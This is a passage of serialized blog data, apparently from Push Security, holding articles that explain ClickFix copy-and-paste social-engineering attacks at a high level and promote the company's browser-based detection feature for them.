requests.",[],{},{"nodeType":1294,"data":2472,"content":2473},{},[2474],{"nodeType":1293,"value":2475,"marks":2476,"data":2477},"Finally, it’s worth considering the future of ClickFix. 
The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? ",[],{},{"nodeType":1351,"data":2479,"content":2483},{"target":2480},{"sys":2481},{"id":2482,"type":1356,"linkType":1357},"2rUDKawJnrmZVtxfNcSNha",[],{"nodeType":1433,"data":2485,"content":2486},{},[],{"nodeType":1437,"data":2488,"content":2489},{},[2490],{"nodeType":1293,"value":2491,"marks":2492,"data":2494},"What’s the impact of ClickFix evolution?",[2493],{"type":1444},{},{"nodeType":1294,"data":2496,"content":2497},{},[2498],{"nodeType":1293,"value":2499,"marks":2500,"data":2501},"To summarize:",[],{},{"nodeType":1536,"data":2503,"content":2504},{},[2505,2515,2525],{"nodeType":1540,"data":2506,"content":2507},{},[2508],{"nodeType":1294,"data":2509,"content":2510},{},[2511],{"nodeType":1293,"value":2512,"marks":2513,"data":2514},"ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering.",[],{},{"nodeType":1540,"data":2516,"content":2517},{},[2518],{"nodeType":1294,"data":2519,"content":2520},{},[2521],{"nodeType":1293,"value":2522,"marks":2523,"data":2524},"ClickFix delivery is evading traditional monitoring controls at the email layer to reach victims. ",[],{},{"nodeType":1540,"data":2526,"content":2527},{},[2528],{"nodeType":1294,"data":2529,"content":2530},{},[2531],{"nodeType":1293,"value":2532,"marks":2533,"data":2534},"ClickFix payloads are becoming more varied and are finding new ways to evade security controls. ",[],{},{"nodeType":1294,"data":2536,"content":2537},{},[2538],{"nodeType":1293,"value":2539,"marks":2540,"data":2541},"This means that EDR-based interception of malware execution is the last — and only — real line of defense for most organizations, kicking in after the initial script has been run (typically acting as a stager for the real malware). 
",[],{},{"nodeType":1294,"data":2543,"content":2544},{},[2545],{"nodeType":1293,"value":2546,"marks":2547,"data":2548},"Malware execution can and should be intercepted by EDR, but it’s not foolproof. ",[],{},{"nodeType":1536,"data":2550,"content":2551},{},[2552,2575,2585],{"nodeType":1540,"data":2553,"content":2554},{},[2555],{"nodeType":1294,"data":2556,"content":2557},{},[2558,2562,2571],{"nodeType":1293,"value":2559,"marks":2560,"data":2561},"Attackers are constantly ",[],{},{"nodeType":1329,"data":2563,"content":2565},{"uri":2564},"https://www.infostealers.com/article/logins-zip-leverages-chromium-zero-day-stealthy-infostealer-builder-promises-99-credential-theft-in-under-12-seconds/",[2566],{"nodeType":1293,"value":2567,"marks":2568,"data":2570},"developing new tools and capabilities",[2569],{"type":1337},{},{"nodeType":1293,"value":2572,"marks":2573,"data":2574}," to bypass EDR in the cat-and-mouse game between attackers and defenders.",[],{},{"nodeType":1540,"data":2576,"content":2577},{},[2578],{"nodeType":1294,"data":2579,"content":2580},{},[2581],{"nodeType":1293,"value":2582,"marks":2583,"data":2584},"Because ClickFix attacks are user initiated, context might be missing that lead to the alert being misclassified. This can mean the difference between the level of priority alert that is raised, and whether or not it is automatically blocked.",[],{},{"nodeType":1540,"data":2586,"content":2587},{},[2588],{"nodeType":1294,"data":2589,"content":2590},{},[2591],{"nodeType":1293,"value":2592,"marks":2593,"data":2594},"If you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.",[],{},{"nodeType":1294,"data":2596,"content":2597},{},[2598,2602,2610],{"nodeType":1293,"value":2599,"marks":2600,"data":2601},"This is why attackers are doubling down. 
According to the ",[],{},{"nodeType":1329,"data":2603,"content":2605},{"uri":2604},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[2606],{"nodeType":1293,"value":2607,"marks":2608,"data":2609},"2025 Microsoft Digital Defense report",[],{},{"nodeType":1293,"value":2611,"marks":2612,"data":2613},", ClickFix was the most common initial access method in the last year, accounting for 47% of attacks. That's a pretty significant stat.",[],{},{"nodeType":2615,"data":2616,"content":2617},"blockquote",{},[2618],{"nodeType":1294,"data":2619,"content":2620},{},[2621],{"nodeType":1293,"value":2622,"marks":2623,"data":2624},"47% of attacks started with ClickFix in the last year, according to Microsoft.",[],{},{"nodeType":1294,"data":2626,"content":2627},{},[2628],{"nodeType":1293,"value":2629,"marks":2630,"data":2631},"Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all. ",[],{},{"nodeType":1433,"data":2633,"content":2634},{},[],{"nodeType":1437,"data":2636,"content":2637},{},[2638],{"nodeType":1293,"value":2639,"marks":2640,"data":2642},"Don’t gamble on a single point of failure ",[2641],{"type":1444},{},{"nodeType":1294,"data":2644,"content":2645},{},[2646,2650,2659],{"nodeType":1293,"value":2647,"marks":2648,"data":2649},"Push Security’s latest feature, ",[],{},{"nodeType":1329,"data":2651,"content":2653},{"uri":2652},"https://pushsecurity.com/blog/introducing-malicious-copy-paste-detection?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[2654],{"nodeType":1293,"value":2655,"marks":2656,"data":2658},"malicious copy and paste detection",[2657],{"type":1337},{},{"nodeType":1293,"value":2660,"marks":2661,"data":2662},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. 
This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",[],{},{"nodeType":1294,"data":2664,"content":2665},{},[2666],{"nodeType":1293,"value":2667,"marks":2668,"data":2669},"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.",[],{},{"nodeType":1294,"data":2671,"content":2672},{},[2673],{"nodeType":1293,"value":2674,"marks":2675,"data":2676},"By adding a new layer of protection in the browser, security teams can reduce the strain on their EDR and reduce the risk of host-based controls being bypassed through misconfiguration or attacker innovation. ",[],{},{"nodeType":1351,"data":2678,"content":2682},{"target":2679},{"sys":2680},{"id":2681,"type":1356,"linkType":1357},"sALkMt8UbTZ2f34hKvGLj",[],{"nodeType":1433,"data":2684,"content":2685},{},[],{"nodeType":1437,"data":2687,"content":2688},{},[2689],{"nodeType":1293,"value":2690,"marks":2691,"data":2693},"Learn more",[2692],{"type":1444},{},{"nodeType":1294,"data":2695,"content":2696},{},[2697,2701,2710],{"nodeType":1293,"value":2698,"marks":2699,"data":2700},"If you want to learn more about ClickFix attacks and how they’re evolving, ",[],{},{"nodeType":1329,"data":2702,"content":2704},{"uri":2703},"https://pushsecurity.com/resources/clickfix",[2705],{"nodeType":1293,"value":2706,"marks":2707,"data":2709},"check out our latest webinar (now available on-demand!)",[2708],{"type":1337},{},{"nodeType":1293,"value":2711,"marks":2712,"data":2713}," where we dive into real-world ClickFix examples and demonstrate how ClickFix sites work under the hood. 
",[],{},{"nodeType":1294,"data":2715,"content":2716},{},[2717,2720,2727,2730,2737],{"nodeType":1293,"value":2111,"marks":2718,"data":2719},[],{},{"nodeType":1329,"data":2721,"content":2722},{"uri":2116},[2723],{"nodeType":1293,"value":2119,"marks":2724,"data":2726},[2725],{"type":1337},{},{"nodeType":1293,"value":2124,"marks":2728,"data":2729},[],{},{"nodeType":1329,"data":2731,"content":2732},{"uri":2129},[2733],{"nodeType":1293,"value":2132,"marks":2734,"data":2736},[2735],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":2738,"data":2739},[],{},{"nodeType":1351,"data":2741,"content":2744},{"target":2742},{"sys":2743},{"id":2296,"type":1356,"linkType":1357},[],{"nodeType":1294,"data":2746,"content":2747},{},[2748],{"nodeType":1293,"value":37,"marks":2749,"data":2750},[],{},"The most advanced ClickFix yet?","Breaking down the most sophisticated ClickFix page we’ve seen in the wild — and what it tells us about the future of malicious copy-and-paste attacks. ","2025-11-06T00:00:00.000Z","the-most-advanced-clickfix-yet",{"items":2756},[2757,2759],{"sys":2758,"name":1310},{"id":1309},{"sys":2760,"name":1306},{"id":1305},{"items":2762},[2763],{"fullName":2164,"firstName":2165,"jobTitle":2166,"profilePicture":2764},{"url":2168},{"__typename":1314,"sys":2766,"content":2768,"title":3390,"synopsis":3391,"hashTags":118,"publishedDate":3392,"slug":3393,"tagsCollection":3394,"authorsCollection":3400},{"id":2767},"1u8RJxC00HbBhCBVxcDnkK",{"json":2769},{"nodeType":1295,"data":2770,"content":2771},{},[2772,2818,2875,2890,2895,2902,2905,2913,2920,2927,2934,2954,2961,2967,2985,2991,2994,3002,3009,3017,3037,3044,3051,3058,3066,3073,3080,3086,3093,3126,3132,3140,3159,3166,3189,3196,3203,3209,3216,3219,3227,3241,3261,3268,3275,3282,3287,3295,3314,3317,3325,3332,3339,3346,3353,3379,3384],{"nodeType":1294,"data":2773,"content":2774},{},[2775,2779,2788,2792,2801,2805,2814],{"nodeType":1293,"value":2776,"marks":2777,"data":2778},"One of the biggest security trends in the past year 
has been the emergence of the attack technique known as ",[],{},{"nodeType":1329,"data":2780,"content":2782},{"uri":2781},"https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/",[2783],{"nodeType":1293,"value":2784,"marks":2785,"data":2787},"ClickFix",[2786],{"type":1337},{},{"nodeType":1293,"value":2789,"marks":2790,"data":2791},". Various reports indicate that ClickFix is fast becoming one of the most prevalent attack techniques this year, with ",[],{},{"nodeType":1329,"data":2793,"content":2795},{"uri":2794},"https://www.scworld.com/news/clickfix-phishing-links-increased-nearly-400-in-12-months-report-says",[2796],{"nodeType":1293,"value":2797,"marks":2798,"data":2800},"one study",[2799],{"type":1337},{},{"nodeType":1293,"value":2802,"marks":2803,"data":2804}," reporting that email-based ClickFix attacks have increased by 400% YOY, and ",[],{},{"nodeType":1329,"data":2806,"content":2808},{"uri":2807},"https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf",[2809],{"nodeType":1293,"value":2810,"marks":2811,"data":2813},"another",[2812],{"type":1337},{},{"nodeType":1293,"value":2815,"marks":2816,"data":2817}," highlighting a 517% increase in the past 6 months. ",[],{},{"nodeType":1294,"data":2819,"content":2820},{},[2821,2825,2834,2837,2846,2849,2858,2862,2871],{"nodeType":1293,"value":2822,"marks":2823,"data":2824},"ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors. 
A number of recent public data breaches have been linked to ClickFix attacks as the attack vector, such as ",[],{},{"nodeType":1329,"data":2826,"content":2828},{"uri":2827},"https://www.bleepingcomputer.com/news/security/kettering-health-confirms-interlock-ransomware-behind-cyberattack/",[2829],{"nodeType":1293,"value":2830,"marks":2831,"data":2833},"Kettering Health",[2832],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":2835,"data":2836},[],{},{"nodeType":1329,"data":2838,"content":2840},{"uri":2839},"https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-davita-attack-leaks-stolen-data/",[2841],{"nodeType":1293,"value":2842,"marks":2843,"data":2845},"DaVita",[2844],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":2847,"data":2848},[],{},{"nodeType":1329,"data":2850,"content":2852},{"uri":2851},"https://www.infosecurity-magazine.com/news/st-paul-mayor-interlock-data-leak/",[2853],{"nodeType":1293,"value":2854,"marks":2855,"data":2857},"City of St. Paul, Minnesota",[2856],{"type":1337},{},{"nodeType":1293,"value":2859,"marks":2860,"data":2861},", and the ",[],{},{"nodeType":1329,"data":2863,"content":2865},{"uri":2864},"https://www.blackfog.com/texas-tech-cyberattack-1-4m-records-compromised/",[2866],{"nodeType":1293,"value":2867,"marks":2868,"data":2870},"Texas Tech University Health Sciences Centers",[2869],{"type":1337},{},{"nodeType":1293,"value":2872,"marks":2873,"data":2874}," (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).",[],{},{"nodeType":1294,"data":2876,"content":2877},{},[2878,2882,2886],{"nodeType":1293,"value":2879,"marks":2880,"data":2881},"Push’s latest feature, ",[],{},{"nodeType":1293,"value":2655,"marks":2883,"data":2885},[2884],{"type":1444},{},{"nodeType":1293,"value":2887,"marks":2888,"data":2889},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection, with a universally effective control that works regardless of 
the lure delivery channel, or page style and structure. ",[],{},{"nodeType":1351,"data":2891,"content":2894},{"target":2892},{"sys":2893},{"id":2681,"type":1356,"linkType":1357},[],{"nodeType":1294,"data":2896,"content":2897},{},[2898],{"nodeType":1293,"value":2899,"marks":2900,"data":2901},"Before we get into the specifics of the feature, let’s take a look at what ClickFix is and why it poses a detection and response challenge to security teams.",[],{},{"nodeType":1433,"data":2903,"content":2904},{},[],{"nodeType":1437,"data":2906,"content":2907},{},[2908],{"nodeType":1293,"value":2909,"marks":2910,"data":2912},"ClickFix 101",[2911],{"type":1444},{},{"nodeType":1294,"data":2914,"content":2915},{},[2916],{"nodeType":1293,"value":2917,"marks":2918,"data":2919},"ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage. The name is a little misleading though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page to the clipboard and running it locally. (For simplicity we’ll keep calling it ClickFix, but we’re not happy about it.)",[],{},{"nodeType":1294,"data":2921,"content":2922},{},[2923],{"nodeType":1293,"value":2924,"marks":2925,"data":2926},"The copy action is either performed manually by the user, or automatically by the page. Manual copies typically include additional social engineering to lure the victim into hitting CTRL+C, while automatic copies are performed using JavaScript running on the page. 
Most ClickFix pages we've seen are automatic copies, which makes sense — fewer steps means the user is more likely to follow the instruction.",[],{},{"nodeType":1294,"data":2928,"content":2929},{},[2930],{"nodeType":1293,"value":2931,"marks":2932,"data":2933},"Most commonly, these attacks are used to deliver remote access software or infostealer malware, with the stolen session cookies and credentials then used to facilitate attacks on business apps and services. From there, the attacker simply dumps the data and holds the victim to ransom for its deletion — often dropping ransomware afterwards for double the extortion. ",[],{},{"nodeType":1294,"data":2935,"content":2936},{},[2937,2941,2950],{"nodeType":1293,"value":2938,"marks":2939,"data":2940},"The attack gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell in order to “fix” the fake problem that they’re experiencing. Variants such as ",[],{},{"nodeType":1329,"data":2942,"content":2944},{"uri":2943},"https://mrd0x.com/filefix-clickfix-alternative/",[2945],{"nodeType":1293,"value":2946,"marks":2947,"data":2949},"FileFix",[2948],{"type":1337},{},{"nodeType":1293,"value":2951,"marks":2952,"data":2953}," have also emerged which instead use the File Explorer Address Bar to execute OS commands.",[],{},{"nodeType":1294,"data":2955,"content":2956},{},[2957],{"nodeType":1293,"value":2958,"marks":2959,"data":2960},"Links to malicious ClickFix pages are distributed over various delivery channels, with attacks shifting from traditional email-based delivery to social media, instant messaging apps, malicious ads in places like Google Search, and in-app notifications and messages across numerous SaaS services. 
",[],{},{"nodeType":1351,"data":2962,"content":2966},{"target":2963},{"sys":2964},{"id":2965,"type":1356,"linkType":1357},"1I9ERDY2tuspw5zVMV5DbY",[],{"nodeType":1294,"data":2968,"content":2969},{},[2970,2974,2981],{"nodeType":1293,"value":2971,"marks":2972,"data":2973},"ClickFix comes in a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. They have also been observed targeting a ",[],{},{"nodeType":1329,"data":2975,"content":2976},{"uri":2433},[2977],{"nodeType":1293,"value":2978,"marks":2979,"data":2980},"wide range of services",[],{},{"nodeType":1293,"value":2982,"marks":2983,"data":2984}," to execute code. ",[],{},{"nodeType":1351,"data":2986,"content":2990},{"target":2987},{"sys":2988},{"id":2989,"type":1356,"linkType":1357},"1SG52ta1hcBZ3gYDsSJvsm",[],{"nodeType":1433,"data":2992,"content":2993},{},[],{"nodeType":1437,"data":2995,"content":2996},{},[2997],{"nodeType":1293,"value":2998,"marks":2999,"data":3001},"Why are ClickFix attacks so effective?",[3000],{"type":1444},{},{"nodeType":1294,"data":3003,"content":3004},{},[3005],{"nodeType":1293,"value":3006,"marks":3007,"data":3008},"To understand the effectiveness of ClickFix-style attacks, we need to look more closely at the mechanisms that security teams have at their disposal to counter these attacks. 
",[],{},{"nodeType":1520,"data":3010,"content":3011},{},[3012],{"nodeType":1293,"value":3013,"marks":3014,"data":3016},"Detection challenges during delivery",[3015],{"type":1444},{},{"nodeType":1294,"data":3018,"content":3019},{},[3020,3024,3033],{"nodeType":1293,"value":3021,"marks":3022,"data":3023},"We’ve written extensively about ",[],{},{"nodeType":1329,"data":3025,"content":3027},{"uri":3026},"https://pushsecurity.com/blog/phishing-detection-evasion-launch/",[3028],{"nodeType":1293,"value":3029,"marks":3030,"data":3032},"the evolution in phishing techniques and tooling",[3031],{"type":1337},{},{"nodeType":1293,"value":3034,"marks":3035,"data":3036},", and what this means for the reliability of traditional detections at the network and endpoint layer. ",[],{},{"nodeType":1294,"data":3038,"content":3039},{},[3040],{"nodeType":1293,"value":3041,"marks":3042,"data":3043},"The latest generation of phishing pages are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",[],{},{"nodeType":1294,"data":3045,"content":3046},{},[3047],{"nodeType":1293,"value":3048,"marks":3049,"data":3050},"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution in 2025 with the rate that attackers refresh and rotate their phishing infrastructure. 
",[],{},{"nodeType":1294,"data":3052,"content":3053},{},[3054],{"nodeType":1293,"value":3055,"marks":3056,"data":3057},"In addition to the fact that ClickFix page styles and content can vary significantly, this means that detecting ClickFix delivery using traditional tooling is highly unreliable. ",[],{},{"nodeType":1520,"data":3059,"content":3060},{},[3061],{"nodeType":1293,"value":3062,"marks":3063,"data":3065},"Detection challenges during execution",[3064],{"type":1444},{},{"nodeType":1294,"data":3067,"content":3068},{},[3069],{"nodeType":1293,"value":3070,"marks":3071,"data":3072},"Most of the detection heavy lifting is being done at the endpoint, looking for user-level code execution and malware running on a device. ",[],{},{"nodeType":1294,"data":3074,"content":3075},{},[3076],{"nodeType":1293,"value":3077,"marks":3078,"data":3079},"However, the number of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",[],{},{"nodeType":1351,"data":3081,"content":3085},{"target":3082},{"sys":3083},{"id":3084,"type":1356,"linkType":1357},"pocty4OhER5EXr8BDwdzo",[],{"nodeType":1294,"data":3087,"content":3088},{},[3089],{"nodeType":1293,"value":3090,"marks":3091,"data":3092},"There are a number of reasons that endpoint-level ClickFix detections can be bypassed:",[],{},{"nodeType":1536,"data":3094,"content":3095},{},[3096,3106,3116],{"nodeType":1540,"data":3097,"content":3098},{},[3099],{"nodeType":1294,"data":3100,"content":3101},{},[3102],{"nodeType":1293,"value":3103,"marks":3104,"data":3105},"The step of downloading a file from the web is bypassed altogether. In a ClickFix/FileFix attack, the initial “dropper” is essentially a command string provided by the attacker and executed by legitimate system utilities. There is often no new executable file written to disk when the user runs the command. 
The final payload may be loaded directly into memory or injected into trusted programs (using living-off-the-land techniques). Without a file to quarantine, there's no \"Mark of the Web\" to make it appear suspicious. ",[],{},{"nodeType":1540,"data":3107,"content":3108},{},[3109],{"nodeType":1294,"data":3110,"content":3111},{},[3112],{"nodeType":1293,"value":3113,"marks":3114,"data":3115},"From the EDR’s point of view, a trusted parent process is launching a script – which might not immediately be judged as malicious, especially if the command is obfuscated or uses allowed system functions. Since the action is initiated by the user, it blends in with normal user-driven administration tasks. ",[],{},{"nodeType":1540,"data":3117,"content":3118},{},[3119],{"nodeType":1294,"data":3120,"content":3121},{},[3122],{"nodeType":1293,"value":3123,"marks":3124,"data":3125},"The PowerShell commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately. 
",[],{},{"nodeType":1351,"data":3127,"content":3131},{"target":3128},{"sys":3129},{"id":3130,"type":1356,"linkType":1357},"6djGsqBFTHlLLITpTK7IMk",[],{"nodeType":1520,"data":3133,"content":3134},{},[3135],{"nodeType":1293,"value":3136,"marks":3137,"data":3139},"Accessing ClickFix-style capabilities is easier than ever",[3138],{"type":1444},{},{"nodeType":1294,"data":3141,"content":3142},{},[3143,3147,3155],{"nodeType":1293,"value":3144,"marks":3145,"data":3146},"This capability is increasingly available to all levels of threat actor, with ",[],{},{"nodeType":1329,"data":3148,"content":3149},{"uri":2781},[3150],{"nodeType":1293,"value":3151,"marks":3152,"data":3154},"off-the-shelf options available",[3153],{"type":1337},{},{"nodeType":1293,"value":3156,"marks":3157,"data":3158}," in the form of ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. ",[],{},{"nodeType":1294,"data":3160,"content":3161},{},[3162],{"nodeType":1293,"value":3163,"marks":3164,"data":3165},"Attackers are bundling ClickFix builders into their existing kits to:",[],{},{"nodeType":1536,"data":3167,"content":3168},{},[3169,3179],{"nodeType":1540,"data":3170,"content":3171},{},[3172],{"nodeType":1294,"data":3173,"content":3174},{},[3175],{"nodeType":1293,"value":3176,"marks":3177,"data":3178},"Use pre-canned landing pages with various lures including Cloudflare. ",[],{},{"nodeType":1540,"data":3180,"content":3181},{},[3182],{"nodeType":1294,"data":3183,"content":3184},{},[3185],{"nodeType":1293,"value":3186,"marks":3187,"data":3188},"Offer construction of malicious commands that users will paste into the Windows Run dialog. ",[],{},{"nodeType":1294,"data":3190,"content":3191},{},[3192],{"nodeType":1293,"value":3193,"marks":3194,"data":3195},"These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. 
The cost of subscription to such a service might be between US$200 and US$1,500 per month. ",[],{},{"nodeType":1294,"data":3197,"content":3198},{},[3199],{"nodeType":1293,"value":3200,"marks":3201,"data":3202},"In short, these capabilities are increasingly accessible to the general population of hackers, and it is increasingly in the interests of malware developers to offer premium hacker tools designed to bypass current detections. ",[],{},{"nodeType":1351,"data":3204,"content":3208},{"target":3205},{"sys":3206},{"id":3207,"type":1356,"linkType":1357},"5hkRsOBZCOABAShCo8RjJg",[],{"nodeType":1294,"data":3210,"content":3211},{},[3212],{"nodeType":1293,"value":3213,"marks":3214,"data":3215},"In any case, relying on just-in-time detection at the point of execution is increasingly unreliable and will always be at the mercy of the cat-and-mouse game between attackers and defenders. Organizations employing custom detections looking for specific malware behavior are likely to have better success than those relying on out-of-the-box EDR configs, but this requires continual maintenance to be effective. 
",[],{},{"nodeType":1433,"data":3217,"content":3218},{},[],{"nodeType":1437,"data":3220,"content":3221},{},[3222],{"nodeType":1293,"value":3223,"marks":3224,"data":3226},"Solving ClickFix detection in the browser with Push",[3225],{"type":1444},{},{"nodeType":1294,"data":3228,"content":3229},{},[3230,3233,3237],{"nodeType":1293,"value":2879,"marks":3231,"data":3232},[],{},{"nodeType":1293,"value":2655,"marks":3234,"data":3236},[3235],{"type":1444},{},{"nodeType":1293,"value":3238,"marks":3239,"data":3240},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking, with a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",[],{},{"nodeType":1294,"data":3242,"content":3243},{},[3244,3248,3257],{"nodeType":1293,"value":3245,"marks":3246,"data":3247},"A key part of our design philosophy is to find ways to universally detect attacker TTPs by analyzing generic attacker actions that can’t be avoided by the attacker. One of our best prior examples of this is with our ",[],{},{"nodeType":1329,"data":3249,"content":3251},{"uri":3250},"https://pushsecurity.com/blog/introducing-sso-password-protection/",[3252],{"nodeType":1293,"value":3253,"marks":3254,"data":3256},"password protection feature",[3255],{"type":1337},{},{"nodeType":1293,"value":3258,"marks":3259,"data":3260},", which detects and blocks phishing attacks by triggering when a user attempts to enter a password that belongs to one domain on a different domain. 
",[],{},{"nodeType":1294,"data":3262,"content":3263},{},[3264],{"nodeType":1293,"value":3265,"marks":3266,"data":3267},"In the case of ClickFix, every attack involves copying a malicious script from a page — a behavior the attacker can’t avoid.",[],{},{"nodeType":1294,"data":3269,"content":3270},{},[3271],{"nodeType":1293,"value":3272,"marks":3273,"data":3274},"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity. ",[],{},{"nodeType":1294,"data":3276,"content":3277},{},[3278],{"nodeType":1293,"value":3279,"marks":3280,"data":3281},"Check out the video below to see Push in action. ",[],{},{"nodeType":1351,"data":3283,"content":3286},{"target":3284},{"sys":3285},{"id":2681,"type":1356,"linkType":1357},[],{"nodeType":1520,"data":3288,"content":3289},{},[3290],{"nodeType":1293,"value":3291,"marks":3292,"data":3294},"Enable ClickFix detection in just a few clicks",[3293],{"type":1444},{},{"nodeType":1294,"data":3296,"content":3297},{},[3298,3302,3310],{"nodeType":1293,"value":3299,"marks":3300,"data":3301},"Check out the ",[],{},{"nodeType":1329,"data":3303,"content":3305},{"uri":3304},"https://pushsecurity.com/help/10141/#start",[3306],{"nodeType":1293,"value":3307,"marks":3308,"data":3309},"help article",[],{},{"nodeType":1293,"value":3311,"marks":3312,"data":3313}," for step-by-step instructions on how to enable the control. ",[],{},{"nodeType":1433,"data":3315,"content":3316},{},[],{"nodeType":1437,"data":3318,"content":3319},{},[3320],{"nodeType":1293,"value":3321,"marks":3322,"data":3324},"Learn more about Push",[3323],{"type":1444},{},{"nodeType":1294,"data":3326,"content":3327},{},[3328],{"nodeType":1293,"value":3329,"marks":3330,"data":3331},"Push provides last mile protection against browser-based attacks, adding a net-new layer of technical protection in the browser. 
",[],{},{"nodeType":1294,"data":3333,"content":3334},{},[3335],{"nodeType":1293,"value":3336,"marks":3337,"data":3338},"Right now, most organizations are left relying on user awareness. Faced with increasingly novel attack types, encountered all over the internet, users are being caught unawares — further reducing the efficacy of an already fragile control. ",[],{},{"nodeType":1294,"data":3340,"content":3341},{},[3342],{"nodeType":1293,"value":3343,"marks":3344,"data":3345},"By seeing what the user sees in the browser, as they see it, as well as monitoring for risky behaviors, Push provides a strong backstop against an ever-expanding landscape of browser-based exploits. ",[],{},{"nodeType":1294,"data":3347,"content":3348},{},[3349],{"nodeType":1293,"value":3350,"marks":3351,"data":3352},"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. 
You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",[],{},{"nodeType":1294,"data":3354,"content":3355},{},[3356,3359,3366,3369,3376],{"nodeType":1293,"value":2111,"marks":3357,"data":3358},[],{},{"nodeType":1329,"data":3360,"content":3361},{"uri":2116},[3362],{"nodeType":1293,"value":2119,"marks":3363,"data":3365},[3364],{"type":1337},{},{"nodeType":1293,"value":2124,"marks":3367,"data":3368},[],{},{"nodeType":1329,"data":3370,"content":3371},{"uri":2129},[3372],{"nodeType":1293,"value":2132,"marks":3373,"data":3375},[3374],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":3377,"data":3378},[],{},{"nodeType":1351,"data":3380,"content":3383},{"target":3381},{"sys":3382},{"id":3130,"type":1356,"linkType":1357},[],{"nodeType":1294,"data":3385,"content":3386},{},[3387],{"nodeType":1293,"value":37,"marks":3388,"data":3389},[],{},"Introducing malicious copy and paste detection","Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. 
","2025-10-09T00:00:00.000Z","introducing-malicious-copy-paste-detection",{"items":3395},[3396,3398],{"sys":3397,"name":1310},{"id":1309},{"sys":3399,"name":1306},{"id":1305},{"items":3401},[3402],{"fullName":2164,"firstName":2165,"jobTitle":2166,"profilePicture":3403},{"url":2168},{"items":3405},[3406],{"fullName":3407,"firstName":3408,"jobTitle":3409,"profilePicture":3410},"Jacques Louw","Jacques","Co-founder / CRO",{"url":3411},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"json":3413,"links":4421},{"nodeType":1295,"data":3414,"content":3415},{},[3416,3422,3429,3436,3444,3460,3466,3469,3477,3484,3491,3498,3505,3512,3519,3526,3533,3539,3545,3552,3558,3565,3572,3578,3584,3590,3596,3616,3628,3635,3641,3648,3655,3688,3695,3703,3710,3716,3723,3729,3736,3755,3762,3765,3773,3780,3875,3882,3888,3891,3899,3906,3913,3920,3960,3963,3971,3991,3998,4006,4216,4224,4257,4265,4274,4280,4288,4295,4303,4314,4322,4328,4336,4347,4355,4363,4371,4379,4387,4395,4406,4413],{"nodeType":1351,"data":3417,"content":3421},{"target":3418},{"sys":3419},{"id":3420,"type":1356,"linkType":1357},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":1294,"data":3423,"content":3424},{},[3425],{"nodeType":1293,"value":3426,"marks":3427,"data":3428},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":1294,"data":3430,"content":3431},{},[3432],{"nodeType":1293,"value":3433,"marks":3434,"data":3435},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. 
